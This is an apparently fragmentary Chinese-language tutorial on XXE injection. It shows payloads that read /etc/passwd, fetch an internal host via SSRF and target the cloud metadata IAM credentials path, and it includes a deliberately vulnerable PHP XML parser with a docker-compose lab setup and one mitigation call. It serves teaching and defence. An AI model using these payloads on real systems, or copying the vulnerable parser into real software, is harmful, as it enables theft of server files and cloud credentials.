XML external entity injection 也就是 XXE,可以透過惡意的請求查看伺服器的敏感資料,若可以搭配伺服器請求偽造 (SSRF) 攻擊,就可以從 XXE 到進階攻擊內部網路。
漏洞成因
XML
XML 實體
DTD ( document type definition ) 文件類型定義
<!DOCTYPE
開始聲明XML自定義實體
XML 外部實體
<?xml version="1.0"?>
<stockCheck>
<productId>
381
</productId>
</stockCheck>
<?xml version="1.0"?>
<!DOCTYPE a [ <!ENTITY b SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
<productId>
&b;
</productId>
</stockCheck>
file:///etc/passwd
/etc/passwd
的值<?xml version="1.0"?>
<!DOCTYPE test [ <!ENTITY b SYSTEM "http://internal.feifei.com/"> ]>
<stockCheck>
<productId>
&b;
</productId>
</stockCheck>
http://169.254.169.254/
/latest/meta-data/iam/security-credentials/admin
PHP
libxml_disable_entity_loader(true);
xml.php
<?php
$data = file_get_contents('php://input');
$test = new SimpleXMLElement($data);
echo $test->name;
?>
docker-compose.yml
version: "2"
services:
web:
image: php:7-apache
ports:
- "8002:80"
volumes:
- ./server:/var/www/html/